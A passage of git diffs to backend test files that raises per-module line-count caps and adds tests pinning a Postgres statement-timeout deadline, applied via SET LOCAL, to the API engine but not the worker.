     # nonce), freshness and reclamation read one publication bound that is a

--- a/backend/tests/test_layering.py
+++ b/backend/tests/test_layering.py
@@ -3480,7 +3480,12 @@ _MODULE_LOC_CAPS: dict[str, int] = {
     # literal `pass%20word` while the API path (SQLAlchemy, which decodes)
     # authenticated fine — fixed with unquote() on user/password.
     # Cap 1423 -> 1501, exact.
-    "backend/app/core/config.py": 1501,
+    # fix(#1778): 1501 -> 1509. +8 for DB_STATEMENT_TIMEOUT_SECONDS and the note
+    # saying why the deadline is applied per request by get_db rather than as a
+    # session default in database_connect_args: the worker imports the same
+    # engine and runs single statements for minutes while indexing or
+    # reprojecting a freshly ingested table.
+    "backend/app/core/config.py": 1509,
     # fix(#1543): first entry — crossed _RATCHET_INCLUSION_LOC on the change
     # that gave PersistentConfig a batch eviction. The code is small
     # (apply_side_effects_batch, plus splitting the process-local half of

--- a/backend/tests/test_layering.py
+++ b/backend/tests/test_layering.py
@@ -3490,15 +3490,18 @@ _MODULE_LOC_CAPS: dict[str, int] = {
     # literal `pass%20word` while the API path (SQLAlchemy, which decodes)
     # authenticated fine — fixed with unquote() on user/password.
     # Cap 1423 -> 1501, exact.
-    # fix(#1778): 1501 -> 1509 -> 1511. +10 for DB_STATEMENT_TIMEOUT_SECONDS and
-    # the note saying why the deadline is applied to the API process's engine
-    # rather than as a session default in database_connect_args: the worker
-    # imports the same engine module and runs single statements for minutes
-    # while indexing or reprojecting a freshly ingested table. The last 2 are
-    # the codex r2 round, which moved it off the get_db dependency because
-    # handlers open request-scoped sessions directly in more than twenty
-    # modules and none of those were covered.
-    "backend/app/core/config.py": 1511,
+    # fix(#1778): 1501 -> 1509 -> 1511 -> 1513. +12 for
+    # DB_STATEMENT_TIMEOUT_SECONDS and the note saying why the deadline is
+    # applied to the API process's engine rather than as a session default in
+    # database_connect_args: the worker imports the same engine module and runs
+    # single statements for minutes while indexing or reprojecting a freshly
+    # ingested table. Two came from the codex r2 round, which moved it off the
+    # get_db dependency because handlers open request-scoped sessions directly
+    # in more than twenty modules and none of those were covered. The last two
+    # are the r3 round: it is issued as SET LOCAL rather than as a startup
+    # parameter, because standard PgBouncer rejects an unknown one and
+    # DB_USE_EXTERNAL_POOLER=true is a supported topology.
+    "backend/app/core/config.py": 1513,
     # fix(#1543): first entry — crossed _RATCHET_INCLUSION_LOC on the change
     # that gave PersistentConfig a batch eviction. The code is small
     # (apply_side_effects_batch, plus splitting the process-local half of

--- a/backend/tests/test_layering.py
+++ b/backend/tests/test_layering.py
@@ -2217,6 +2217,16 @@ _OPEN_CORE_SIZE_CAPS: dict[str, int] = {
 #     empty-tile Cache-Control (#430 V-03). NOTE: `_check_cold_rehydrate` is pinned to
 #     this module by the overlay's 1214-05 static AST proof, so the tile_seams.py split
 #     must update the overlay in lockstep.
+#   api/main.py 1846 -> 1883. fix(#1778 codex r2): +37 for
+#     `install_api_query_deadline` and the note under it. The query deadline
+#     moved off the `get_db` dependency onto the engine this process owns,
+#     because handlers open request-scoped sessions directly through
+#     `async_session()` in more than twenty modules -- `GET /stac/collections`
+#     runs three aggregates that way -- and a per-dependency binding covered
+#     none of them. Most of the addition is why it runs at import rather than
+#     in the lifespan (`do_connect` only fires for connections opened after
+#     registration), why the engine is late-bound (fix(#909)), and why the
+#     worker, which never imports this module, must stay excluded.
 #   api/main.py 1796 -> 1846. fix(#1778): +50 across two audit findings. The
 #     /health/live route (liveness, no dependency probes) and the paragraph
 #     saying why the container healthcheck and the frontend's depends_on had to
@@ -2532,7 +2542,7 @@ _MODULE_LOC_CAPS: dict[str, int] = {
     # reach a backup, while /tmp is a per-container 512m tmpfs. Re-baselined on
     # the rebase across #1753, which raised the same cap for the token purge.
     # Cap 1789 -> 1796, exact.
-    "backend/app/api/main.py": 1846,
+    "backend/app/api/main.py": 1883,
     # fix(#1005): +4 — MapSummaryResponse gains thumbnail_updated_at, the
     # thumbnail cache version split out of updated_at. Ratchet stays exact.
     # fix(#910): +1 on top of that, the fillColorSaved entry in the authoritative
@@ -3480,12 +3490,15 @@ _MODULE_LOC_CAPS: dict[str, int] = {
     # literal `pass%20word` while the API path (SQLAlchemy, which decodes)
     # authenticated fine — fixed with unquote() on user/password.
     # Cap 1423 -> 1501, exact.
-    # fix(#1778): 1501 -> 1509. +8 for DB_STATEMENT_TIMEOUT_SECONDS and the note
-    # saying why the deadline is applied per request by get_db rather than as a
-    # session default in database_connect_args: the worker imports the same
-    # engine and runs single statements for minutes while indexing or
-    # reprojecting a freshly ingested table.
-    "backend/app/core/config.py": 1509,
+    # fix(#1778): 1501 -> 1509 -> 1511. +10 for DB_STATEMENT_TIMEOUT_SECONDS and
+    # the note saying why the deadline is applied to the API process's engine
+    # rather than as a session default in database_connect_args: the worker
+    # imports the same engine module and runs single statements for minutes
+    # while indexing or reprojecting a freshly ingested table. The last 2 are
+    # the codex r2 round, which moved it off the get_db dependency because
+    # handlers open request-scoped sessions directly in more than twenty
+    # modules and none of those were covered.
+    "backend/app/core/config.py": 1511,
     # fix(#1543): first entry — crossed _RATCHET_INCLUSION_LOC on the change
     # that gave PersistentConfig a batch eviction. The code is small
     # (apply_side_effects_batch, plus splitting the process-local half of

--- a/backend/tests/test_layering.py
+++ b/backend/tests/test_layering.py
@@ -2217,6 +2217,16 @@ _OPEN_CORE_SIZE_CAPS: dict[str, int] = {
 #     empty-tile Cache-Control (#430 V-03). NOTE: `_check_cold_rehydrate` is pinned to
 #     this module by the overlay's 1214-05 static AST proof, so the tile_seams.py split
 #     must update the overlay in lockstep.
+#   api/main.py 1796 -> 1846. fix(#1778): +50 across two audit findings. The
+#     /health/live route (liveness, no dependency probes) and the paragraph
+#     saying why the container healthcheck and the frontend's depends_on had to
+#     stop targeting /health: it probes the cache, which the API is built to
+#     survive, so a Valkey outage marked the container unhealthy and took the
+#     UI down with it. The rest is the note on _rate_limit_handler explaining
+#     why it must stay a plain def -- slowapi's synchronous middleware silently
+#     discards a coroutine handler and answers the global rate limit with a
+#     bare {"error": ...} and no Retry-After, which is unreachable from any
+#     test that drives a decorated route.
 #   api/main.py 1635 -> 1750. fix(#1666): +115 for three OpenAPI post-processing
 #     passes, joining the four already here. `_normalize_validation_error_contract`
 #     replaces FastAPI's `HTTPValidationError` at every 422 with the problem+json
@@ -2522,7 +2532,7 @@ _MODULE_LOC_CAPS: dict[str, int] = {
     # reach a backup, while /tmp is a per-container 512m tmpfs. Re-baselined on
     # the rebase across #1753, which raised the same cap for the token purge.
     # Cap 1789 -> 1796, exact.
-    "backend/app/api/main.py": 1796,
+    "backend/app/api/main.py": 1846,
     # fix(#1005): +4 — MapSummaryResponse gains thumbnail_updated_at, the
     # thumbnail cache version split out of updated_at. Ratchet stays exact.
     # fix(#910): +1 on top of that, the fillColorSaved entry in the authoritative

--- a/backend/tests/test_layering.py
+++ b/backend/tests/test_layering.py
@@ -4646,14 +4646,17 @@ _MODULE_LOC_CAPS: dict[str, int] = {
     # fix(#1778): +3 lines — download_cog documents the
     # 412 its If-Match branch raises, closing a gap the repaired
     # OpenAPI-contract gate surfaced. Cap 1548 -> 1551, exact.
-    # fix(#1778): 1551 -> 1602. +51 for `_cog_presign_seconds` and the note
-    # above it. The s3 branch signed the redirect for a flat 3600 seconds,
+    # fix(#1778): 1551 -> 1602 -> 1632. +81 for `_cog_presign_seconds` and the
+    # note above it. The s3 branch signed the redirect for a flat 3600 seconds,
     # which exchanged the 120-second, dataset-scoped, revocable download token
     # SEC-04 mints for an hour-long bearer URL the bucket will honour after the
-    # grant is revoked. Most of the addition is why the ceiling and the floor
-    # are the values they are: the deadline is evaluated when the bucket
-    # receives the request, not over the transfer.
-    "backend/app/modules/catalog/datasets/api/router_export.py": 1602,
+    # grant is revoked. The last 30 are the codex r8 round, which removed the
+    # 60-second floor the first pass had put under the window: a token with one
+    # second left still bought a minute of access to a private COG. Those lines
+    # are the refusal that replaced it and the reason it has to be a refusal,
+    # quoting `require_signable_job_lifetime`, which settled the same question
+    # for the upload doors under #1235.
+    "backend/app/modules/catalog/datasets/api/router_export.py": 1632,
     # fix(#1532 review r29): first entry — crossed _RATCHET_INCLUSION_LOC. The
     # export artifact cache: everything is in the key (stamp, size, digest,
     # nonce), freshness and reclamation read one publication bound that is a

--- a/backend/tests/test_request_statement_timeout_1778.py
+++ b/backend/tests/test_request_statement_timeout_1778.py
@@ -13,6 +13,15 @@ open request-scoped sessions directly through ``async_session()`` in more than
 twenty modules -- ``GET /stac/collections`` runs three aggregates that way --
 so a per-dependency binding covered none of them.
 
+fix(#1778 codex r5): the statement is a ``SET LOCAL`` UTILITY statement, not
+``SELECT set_config(..., true)``. The two set the same GUC, but the SELECT form
+is a query and takes the transaction's first snapshot, after which Postgres
+refuses ``SET TRANSACTION ISOLATION LEVEL`` and ``SET TRANSACTION [NOT]
+DEFERRABLE`` (25001). ``SET TRANSACTION READ ONLY`` is unaffected by either
+form -- the first-query restriction applies to ``transaction_read_only`` only
+when going read-only to read-write -- and both properties are pinned below
+against the live database rather than reasoned about.
+
 fix(#1778 codex r3): and it is issued as ``SET LOCAL`` at the start of every
 transaction, not as asyncpg ``server_settings``. ``server_settings`` travels in
 the startup packet, which standard PgBouncer rejects, so under the documented
@@ -24,9 +33,11 @@ both topologies, so the direct and pooled paths cannot drift.
 
 from __future__ import annotations
 
+import ast
 import inspect
 import subprocess
 import sys
+import textwrap
 from pathlib import Path
 
 import pytest
@@ -259,3 +270,126 @@ async def test_a_zero_setting_installs_nothing(test_db_session, monkeypatch):
             assert result.scalar_one() == "0"
     finally:
         await engine.dispose()
+
+
+# ---------------------------------------------------------------------------
+# fix(#1778 codex r5): what a begin-time hook may and may not consume
+# ---------------------------------------------------------------------------
+
+
+def _both_hooks_engine():
+    """An engine carrying the tenant GUC hook AND the statement deadline.
+
+    The production API engine has both, and a defect that only appears when
+    they are stacked is exactly the kind this module exists to catch.
+    """
+    from app.core.db.tenant_session import install_tenant_session_hook
+
+    engine = _fresh_engine()
+    install_tenant_session_hook(engine)
+    install_api_statement_timeout(engine)
+    return engine
+
+
+@pytest.mark.anyio
+async def test_the_hooks_do_not_take_the_transactions_first_snapshot(test_db_session):
+    """`SET TRANSACTION ISOLATION LEVEL` must still be legal after the hooks.
+
+    This is the real exposure of a `SELECT`-shaped begin hook. Postgres
+    refuses ISOLATION LEVEL and DEFERRABLE once a query has run in the
+    transaction, and `processing/ingest/tasks_postgis_refresh.py` documents
+    having been bitten by it through the tenant hook: the in-transaction
+    spelling of REPEATABLE READ worked in single_tenant, where that hook is a
+    no-op, and failed on multi-tenant. A second `SELECT` hook would have
+    extended that to every deployment.
+    """
+    engine = _both_hooks_engine()
+    try:
+        async with engine.connect() as conn:
+            async with conn.begin():
+                # Would raise ActiveSQLTransactionError (25001) if either hook
+                # had run a query first.
+                await conn.execute(text("SET TRANSACTION ISOLATION LEVEL SERIALIZABLE"))
+                await conn.execute(text("SET TRANSACTION DEFERRABLE"))
+                level = (
+                    await conn.execute(text("SHOW transaction_isolation"))
+                ).scalar_one()
+                assert level == "serializable"
+                # ...and the deadline is still in force in that transaction.
+                timeout = (await conn.execute(_SHOW_TIMEOUT)).scalar_one()
+                assert timeout == str(statement_timeout_ms())
+    finally:
+        await engine.dispose()
+
+
+@pytest.mark.anyio
+async def test_the_sandbox_write_backstop_holds_under_the_hooks(test_db_session):
+    """`SET TRANSACTION READ ONLY` still refuses a write, with no warning.
+
+    `platform/sandbox/executor.py` opens a transaction on this engine and
+    issues READ ONLY as its database-level guard against a write from
+    AI-generated SQL. Pinned here because it is the property a begin-time hook
+    would be most costly to break, even though Postgres does not in fact
+    restrict this direction after a snapshot.
+    """
+    from sqlalchemy.exc import DBAPIError
+
+    engine = _both_hooks_engine()
+    notices: list[str] = []
+    try:
+        async with engine.connect() as conn:
+            raw = await conn.get_raw_connection()
+            raw.driver_connection.add_log_listener(
+                lambda _c, message: notices.append(str(message))
+            )
+            async with conn.begin():
+                await conn.execute(text("SET TRANSACTION READ ONLY"))
+                assert (
+                    await conn.execute(text("SHOW transaction_read_only"))
+                ).scalar_one() == "on"
+                assert (await conn.execute(_SHOW_TIMEOUT)).scalar_one() == str(
+                    statement_timeout_ms()
+                )
+                with pytest.raises(DBAPIError) as excinfo:
+                    await conn.execute(text("CREATE TEMP TABLE guard_probe (a int)"))
+                assert "read-only transaction" in str(excinfo.value)
+    finally:
+        await engine.dispose()
+
+    assert not notices, f"the server warned while the guard was being set: {notices}"
+
+
+def test_neither_begin_hook_issues_a_query():
+    """The rule, on the source: a begin hook runs utility statements only.
+
+    A new hook that reaches for `SELECT set_config(...)` is the defect this
+    round fixed, and it would pass every other test in this module.
+    """
+    from app.core.db import tenant_session
+    from app.core import statement_timeout as timeout_module
+
+    hooks = {
+        "tenant GUC": inspect.getsource(tenant_session._on_begin),
+        "statement deadline": inspect.getsource(
+            timeout_module.install_api_statement_timeout
+        ),
+    }
+    for label, src in hooks.items():
+        # ast.unparse drops comments AND the docstring, so prose explaining why
+        # set_config is not used cannot be mistaken for a use of it.
+        tree = ast.parse(textwrap.dedent(src))
+        fn = tree.body[0]
+        assert isinstance(fn, ast.FunctionDef)
+        if fn.body and isinstance(fn.body[0], ast.Expr):
+            first = fn.body[0].value
+            if isinstance(first, ast.Constant) and isinstance(first.value, str):
+                fn.body = fn.body[1:]
+        code = ast.unparse(fn)
+        assert "set_config" not in code, (
+            f"the {label} begin hook runs `set_config`, which is a SELECT: it "
+            "takes the transaction's first snapshot and locks out SET "
+            "TRANSACTION ISOLATION LEVEL / DEFERRABLE"
+        )
+        assert "SET LOCAL" in code, (
+            f"the {label} begin hook must use a SET LOCAL utility statement"
+        )

--- a/backend/tests/test_request_statement_timeout_1778.py
+++ b/backend/tests/test_request_statement_timeout_1778.py
@@ -1,25 +1,44 @@
-"""fix(#1778): every ordinary DB-touching request needs a query deadline.
+"""fix(#1778): every session the API opens needs a query deadline.
 
-Nothing bounded statement execution on the engine each request uses.
+Nothing bounded statement execution on the engine the API uses.
 ``database_connect_args`` carries only the SSL branch and, behind an external
 pooler, ``statement_cache_size``; ``core/db/session.py`` adds pool sizing, and
 ``pool_timeout`` bounds checkout rather than execution. ``db/postgresql.conf``
 sets no ``statement_timeout`` either. Combined with uvicorn not cancelling a
 handler when its client disconnects, one pathological plan pinned a pool slot
 with no ceiling.
+
+fix(#1778 codex r2): the deadline is on the ENGINE, not on ``get_db``. Handlers
+open request-scoped sessions directly through ``async_session()`` in more than
+twenty modules -- ``GET /stac/collections`` runs three aggregates that way --
+so a per-dependency binding covered none of them.
 """
 
 from __future__ import annotations
 
 import inspect
+import subprocess
+import sys
+from pathlib import Path
 
 import pytest
 from sqlalchemy import text
+from sqlalchemy.ext.asyncio import async_sessionmaker, create_async_engine
+from sqlalchemy.pool import NullPool
 
 from app.core.statement_timeout import (
-    bind_request_statement_timeout,
+    install_api_statement_timeout,
     statement_timeout_ms,
 )
+
+_SHOW_TIMEOUT = text("SELECT setting FROM pg_settings WHERE name = 'statement_timeout'")
+
+
+def _fresh_engine():
+    """An engine of our own, so the shared test engine keeps its own state."""
+    from app.core.config import settings
+
+    return create_async_engine(settings.test_database_url, poolclass=NullPool)
 
 
 def test_the_deadline_is_on_by_default_and_fits_inside_the_edge_timeout():
@@ -33,70 +52,117 @@ def test_the_deadline_is_on_by_default_and_fits_inside_the_edge_timeout():
     assert statement_timeout_ms() == settings.db_statement_timeout_seconds * 1000
 
 
-def test_get_db_binds_it_and_nothing_else_does():
-    """Scoped to HTTP requests. The worker shares the engine and must not get it."""
+def test_the_api_entrypoint_installs_it_on_the_engine():
+    """Import time, so no connection predates the listener; again at lifespan."""
+    from app.api import main as api_main
+
+    src = inspect.getsource(api_main.install_api_query_deadline)
+    assert "install_api_statement_timeout(engine)" in src
+    assert "from app.core.db import engine" in src, (
+        "fix(#909): the engine must be late-bound or the fixture's patch is lost"
+    )
+
+    module_src = inspect.getsource(api_main)
+    assert "\ninstall_api_query_deadline()\n" in module_src, (
+        "the install has to run at import, before the pool opens a connection"
+    )
+    assert "install_api_query_deadline()" in inspect.getsource(api_main.lifespan)
+
+
+def test_get_db_no_longer_binds_it_per_session():
+    """The per-dependency binding was the bug, not the fix."""
     from app.core.dependencies import get_db
 
-    assert "bind_request_statement_timeout(session)" in inspect.getsource(get_db)
+    assert "statement_timeout" not in inspect.getsource(get_db)
 
+
+def test_the_shared_engine_module_carries_no_session_default():
+    """A session default there would reach the worker, which shares the module."""
     from app.core.db import session as session_module
 
-    src = inspect.getsource(session_module)
-    assert "statement_timeout" not in src, (
-        "a session default on the shared engine would kill worker ingest queries"
+    assert "statement_timeout" not in inspect.getsource(session_module)
+
+    from app.core.config import settings
+
+    assert "server_settings" not in settings.database_connect_args
+
+
+@pytest.mark.anyio
+async def test_a_session_from_async_session_runs_under_the_deadline(test_db_session):
+    """The pin: not get_db, a bare `async_session()` the way handlers open one.
+
+    ``test_db_session`` is requested only so this module's DB gating applies.
+    """
+    engine = _fresh_engine()
+    install_api_statement_timeout(engine)
+    session_factory = async_sessionmaker(engine, expire_on_commit=False)
+    try:
+        async with session_factory() as session:
+            result = await session.execute(_SHOW_TIMEOUT)
+            assert result.scalar_one() == str(statement_timeout_ms())
+
+            # It survives a commit, unlike SET LOCAL: a handler that writes,
+            # commits, and reads again stays bounded.
+            await session.commit()
+            result = await session.execute(_SHOW_TIMEOUT)
+            assert result.scalar_one() == str(statement_timeout_ms())
+            await session.rollback()
+    finally:
+        await engine.dispose()
+
+
+@pytest.mark.anyio
+async def test_a_worker_engine_gets_no_deadline(test_db_session):
+    """The worker is a separate process with its own engine and must stay free.
+
+    It runs single statements for minutes while building a spatial index over a
+    freshly ingested table. Its entrypoint never imports app.api.main, so
+    nothing installs the listener there.
+    """
+    engine = _fresh_engine()  # deliberately NOT installed on
+    try:
+        async with engine.connect() as conn:
+            result = await conn.execute(_SHOW_TIMEOUT)
+            assert result.scalar_one() == "0"
+    finally:
+        await engine.dispose()
+
+    # And the real property behind that: importing the worker entrypoint does
+    # not pull in the module that installs the listener. Checked in a fresh
+    # interpreter because this one has already imported app.api.main.
+    probe = subprocess.run(
+        [
+            sys.executable,
+            "-c",
+            "import app.platform.jobs.worker, sys; "
+            "print('app.api.main' in sys.modules)",
+        ],
+        capture_output=True,
+        text=True,
+        cwd=Path(__file__).resolve().parents[1],
+    )
+    assert probe.returncode == 0, probe.stderr[-2000:]
+    assert probe.stdout.strip() == "False", (
+        "the worker entrypoint now imports app.api.main, so its engine would "
+        "inherit the API's statement deadline and long ingest statements would "
+        "be cancelled"
     )
 
 
 @pytest.mark.anyio
-async def test_get_db_yields_a_session_that_carries_the_deadline(test_db_session):
-    """Drive the dependency itself, transaction boundaries included.
-
-    ``test_db_session`` is requested only so the module's DB gating applies;
-    the assertions run on the session ``get_db`` builds.
-    """
-    from app.core.dependencies import get_db
-
-    assert statement_timeout_ms() > 0
-    # pg_settings reports the raw milliseconds; SHOW renders "5min".
-    expected = str(statement_timeout_ms())
-
-    agen = get_db()
-    session = await agen.__anext__()
+async def test_set_local_still_overrides_it(test_db_session):
+    """The escape hatch the long-running API routes already use."""
+    engine = _fresh_engine()
+    install_api_statement_timeout(engine)
+    session_factory = async_sessionmaker(engine, expire_on_commit=False)
     try:
-
-        async def current_timeout() -> str:
-            result = await session.execute(
-                text("SELECT setting FROM pg_settings WHERE name = 'statement_timeout'")
-            )
-            return result.scalar_one()
-
-        first = await current_timeout()
-        assert first == expected, "no deadline on the first transaction"
-
-        # A handler that writes, commits, and reads again must not run the
-        # rest of the request unbounded: SET LOCAL ends with its transaction.
-        await session.commit()
-        assert await current_timeout() == expected
-
-        await session.rollback()
-        assert await current_timeout() == expected
+        async with session_factory() as session:
+            await session.execute(text("SET LOCAL statement_timeout = '1800000'"))
+            result = await session.execute(_SHOW_TIMEOUT)
+            assert result.scalar_one() == "1800000"
+            await session.rollback()
     finally:
-        await session.rollback()
-        with pytest.raises(StopAsyncIteration):
-            await agen.__anext__()
-
-
-@pytest.mark.anyio
-async def test_a_worker_session_is_not_given_the_deadline(test_db_session):
-    """The worker shares this engine and runs minutes-long ingest statements."""
-    from app.core.db import async_session
-
-    async with async_session() as session:
-        result = await session.execute(
-            text("SELECT setting FROM pg_settings WHERE name = 'statement_timeout'")
-        )
-        assert result.scalar_one() == "0"
-        await session.rollback()
+        await engine.dispose()
 
 
 @pytest.mark.anyio
@@ -111,16 +177,18 @@ async def test_a_query_past_the_deadline_is_cancelled(test_db_session):
 
 
 @pytest.mark.anyio
-async def test_a_zero_setting_binds_nothing(test_db_session, monkeypatch):
+async def test_a_zero_setting_installs_nothing(test_db_session, monkeypatch):
     """0 is the documented off switch, and off means no listener at all."""
     from app.core.config import settings
 
     monkeypatch.setattr(settings, "db_statement_timeout_seconds", 0)
     assert statement_timeout_ms() == 0
 
-    bind_request_statement_timeout(test_db_session)
-    result = await test_db_session.execute(
-        text("SELECT setting FROM pg_settings WHERE name = 'statement_timeout'")
-    )
-    assert result.scalar_one() == "0"
-    await test_db_session.rollback()
+    engine = _fresh_engine()
+    install_api_statement_timeout(engine)
+    try:
+        async with engine.connect() as conn:
+            result = await conn.execute(_SHOW_TIMEOUT)
+            assert result.scalar_one() == "0"
+    finally:
+        await engine.dispose()

--- a/backend/tests/test_request_statement_timeout_1778.py
+++ b/backend/tests/test_request_statement_timeout_1778.py
@@ -12,6 +12,14 @@ fix(#1778 codex r2): the deadline is on the ENGINE, not on ``get_db``. Handlers
 open request-scoped sessions directly through ``async_session()`` in more than
 twenty modules -- ``GET /stac/collections`` runs three aggregates that way --
 so a per-dependency binding covered none of them.
+
+fix(#1778 codex r3): and it is issued as ``SET LOCAL`` at the start of every
+transaction, not as asyncpg ``server_settings``. ``server_settings`` travels in
+the startup packet, which standard PgBouncer rejects, so under the documented
+``DB_USE_EXTERNAL_POOLER=true`` topology every API connection and API startup
+would have failed -- and the usual remedy, adding the parameter to
+``ignore_startup_parameters``, drops the deadline in silence. One shape for
+both topologies, so the direct and pooled paths cannot drift.
 """
 
 from __future__ import annotations
@@ -22,7 +30,7 @@ import sys
 from pathlib import Path
 
 import pytest
-from sqlalchemy import text
+from sqlalchemy import event, text
 from sqlalchemy.ext.asyncio import async_sessionmaker, create_async_engine
 from sqlalchemy.pool import NullPool
 
@@ -34,11 +42,24 @@ from app.core.statement_timeout import (
 _SHOW_TIMEOUT = text("SELECT setting FROM pg_settings WHERE name = 'statement_timeout'")
 
 
-def _fresh_engine():
+def _fresh_engine(**kwargs):
     """An engine of our own, so the shared test engine keeps its own state."""
     from app.core.config import settings
 
-    return create_async_engine(settings.test_database_url, poolclass=NullPool)
+    return create_async_engine(settings.test_database_url, poolclass=NullPool, **kwargs)
+
+
+def _captured_connect_params(engine) -> dict:
+    """The kwargs the dialect will hand asyncpg, captured at connect time."""
+    captured: dict = {}
+
+    @event.listens_for(engine.sync_engine, "do_connect")
+    def _capture(_dialect, _conn_rec, _cargs, cparams):
+        captured.clear()
+        captured.update(cparams)
+        return None
+
+    return captured
 
 
 def test_the_deadline_is_on_by_default_and_fits_inside_the_edge_timeout():
@@ -87,26 +108,72 @@ def test_the_shared_engine_module_carries_no_session_default():
     assert "server_settings" not in settings.database_connect_args
 
 
+def test_the_installer_sets_no_startup_parameter():
+    """fix(#1778 codex r3): the source must not reach for server_settings.
+
+    Standard PgBouncer rejects an unknown startup parameter, so a
+    `server_settings` entry fails every connection under the documented
+    external-pooler topology, and `ignore_startup_parameters` "fixes" it by
+    dropping the deadline in silence.
+    """
+    from app.core.statement_timeout import install_api_statement_timeout as installer
+
+    code = inspect.getsource(installer)
+    assert "server_settings" not in code, (
+        "the installer must not put anything in the startup packet"
+    )
+    # And the mechanism it uses instead: SET LOCAL, with a bound value.
+    assert "set_config" in code
+    assert "true" in code, "set_config's is_local argument must be true"
+
+
 @pytest.mark.anyio
-async def test_a_session_from_async_session_runs_under_the_deadline(test_db_session):
+@pytest.mark.parametrize("external_pooler", [False, True])
+async def test_a_session_from_async_session_runs_under_the_deadline(
+    test_db_session, monkeypatch, external_pooler
+):
     """The pin: not get_db, a bare `async_session()` the way handlers open one.
 
-    ``test_db_session`` is requested only so this module's DB gating applies.
+    fix(#1778 codex r3): run under both topologies, because they must behave
+    the same. ``test_db_session`` is requested only so this module's DB gating
+    applies.
     """
-    engine = _fresh_engine()
+    from app.core.config import settings
+
+    monkeypatch.setattr(settings, "db_use_external_pooler", external_pooler)
+
+    engine = _fresh_engine(connect_args=settings.database_connect_args)
     install_api_statement_timeout(engine)
+    # Registered LAST so it observes what every earlier `do_connect` listener
+    # has already put in `cparams` -- registering it first would snapshot the
+    # parameters before the installer could have added anything, and the
+    # assertion below would pass vacuously.
+    connect_params = _captured_connect_params(engine)
     session_factory = async_sessionmaker(engine, expire_on_commit=False)
     try:
         async with session_factory() as session:
             result = await session.execute(_SHOW_TIMEOUT)
             assert result.scalar_one() == str(statement_timeout_ms())
 
-            # It survives a commit, unlike SET LOCAL: a handler that writes,
-            # commits, and reads again stays bounded.
+            # The startup packet is what PgBouncer inspects, and it must carry
+            # nothing of ours -- under either topology, since there is one
+            # shape rather than a branch.
+            assert connect_params, "no connection was opened"
+            assert "server_settings" not in connect_params, (
+                "a startup parameter here fails every connection through "
+                "standard PgBouncer"
+            )
+
+            # SET LOCAL ends with its transaction, so the next one must get it
+            # again: a handler that writes, commits and reads again stays
+            # bounded.
             await session.commit()
             result = await session.execute(_SHOW_TIMEOUT)
             assert result.scalar_one() == str(statement_timeout_ms())
+
             await session.rollback()
+            result = await session.execute(_SHOW_TIMEOUT)
+            assert result.scalar_one() == str(statement_timeout_ms())
     finally:
         await engine.dispose()
 

--- a/backend/tests/test_request_statement_timeout_1778.py
+++ b/backend/tests/test_request_statement_timeout_1778.py
@@ -1,0 +1,126 @@
+"""fix(#1778): every ordinary DB-touching request needs a query deadline.
+
+Nothing bounded statement execution on the engine each request uses.
+``database_connect_args`` carries only the SSL branch and, behind an external
+pooler, ``statement_cache_size``; ``core/db/session.py`` adds pool sizing, and
+``pool_timeout`` bounds checkout rather than execution. ``db/postgresql.conf``
+sets no ``statement_timeout`` either. Combined with uvicorn not cancelling a
+handler when its client disconnects, one pathological plan pinned a pool slot
+with no ceiling.
+"""
+
+from __future__ import annotations
+
+import inspect
+
+import pytest
+from sqlalchemy import text
+
+from app.core.statement_timeout import (
+    bind_request_statement_timeout,
+    statement_timeout_ms,
+)
+
+
+def test_the_deadline_is_on_by_default_and_fits_inside_the_edge_timeout():
+    from app.core.config import settings
+    from app.processing.ingest.url_fetch import EDGE_PROXY_READ_TIMEOUT_SECONDS
+
+    assert settings.db_statement_timeout_seconds > 0, (
+        "shipping the knob off by default fixes nothing"
+    )
+    assert settings.db_statement_timeout_seconds < EDGE_PROXY_READ_TIMEOUT_SECONDS
+    assert statement_timeout_ms() == settings.db_statement_timeout_seconds * 1000
+
+
+def test_get_db_binds_it_and_nothing_else_does():
+    """Scoped to HTTP requests. The worker shares the engine and must not get it."""
+    from app.core.dependencies import get_db
+
+    assert "bind_request_statement_timeout(session)" in inspect.getsource(get_db)
+
+    from app.core.db import session as session_module
+
+    src = inspect.getsource(session_module)
+    assert "statement_timeout" not in src, (
+        "a session default on the shared engine would kill worker ingest queries"
+    )
+
+
+@pytest.mark.anyio
+async def test_get_db_yields_a_session_that_carries_the_deadline(test_db_session):
+    """Drive the dependency itself, transaction boundaries included.
+
+    ``test_db_session`` is requested only so the module's DB gating applies;
+    the assertions run on the session ``get_db`` builds.
+    """
+    from app.core.dependencies import get_db
+
+    assert statement_timeout_ms() > 0
+    # pg_settings reports the raw milliseconds; SHOW renders "5min".
+    expected = str(statement_timeout_ms())
+
+    agen = get_db()
+    session = await agen.__anext__()
+    try:
+
+        async def current_timeout() -> str:
+            result = await session.execute(
+                text("SELECT setting FROM pg_settings WHERE name = 'statement_timeout'")
+            )
+            return result.scalar_one()
+
+        first = await current_timeout()
+        assert first == expected, "no deadline on the first transaction"
+
+        # A handler that writes, commits, and reads again must not run the
+        # rest of the request unbounded: SET LOCAL ends with its transaction.
+        await session.commit()
+        assert await current_timeout() == expected
+
+        await session.rollback()
+        assert await current_timeout() == expected
+    finally:
+        await session.rollback()
+        with pytest.raises(StopAsyncIteration):
+            await agen.__anext__()
+
+
+@pytest.mark.anyio
+async def test_a_worker_session_is_not_given_the_deadline(test_db_session):
+    """The worker shares this engine and runs minutes-long ingest statements."""
+    from app.core.db import async_session
+
+    async with async_session() as session:
+        result = await session.execute(
+            text("SELECT setting FROM pg_settings WHERE name = 'statement_timeout'")
+        )
+        assert result.scalar_one() == "0"
+        await session.rollback()
+
+
+@pytest.mark.anyio
+async def test_a_query_past_the_deadline_is_cancelled(test_db_session):
+    """The teeth. A short deadline aborts pg_sleep rather than waiting it out."""
+    from sqlalchemy.exc import DBAPIError
+
+    await test_db_session.execute(text("SET LOCAL statement_timeout = 250"))
+    with pytest.raises(DBAPIError):
+        await test_db_session.execute(text("SELECT pg_sleep(5)"))
+    await test_db_session.rollback()
+
+
+@pytest.mark.anyio
+async def test_a_zero_setting_binds_nothing(test_db_session, monkeypatch):
+    """0 is the documented off switch, and off means no listener at all."""
+    from app.core.config import settings
+
+    monkeypatch.setattr(settings, "db_statement_timeout_seconds", 0)
+    assert statement_timeout_ms() == 0
+
+    bind_request_statement_timeout(test_db_session)
+    result = await test_db_session.execute(
+        text("SELECT setting FROM pg_settings WHERE name = 'statement_timeout'")
+    )
+    assert result.scalar_one() == "0"
+    await test_db_session.rollback()

--- a/backend/tests/test_staging_runtime.py
+++ b/backend/tests/test_staging_runtime.py
@@ -1,3 +1,4 @@
+import inspect
 import os
 import stat
 import time
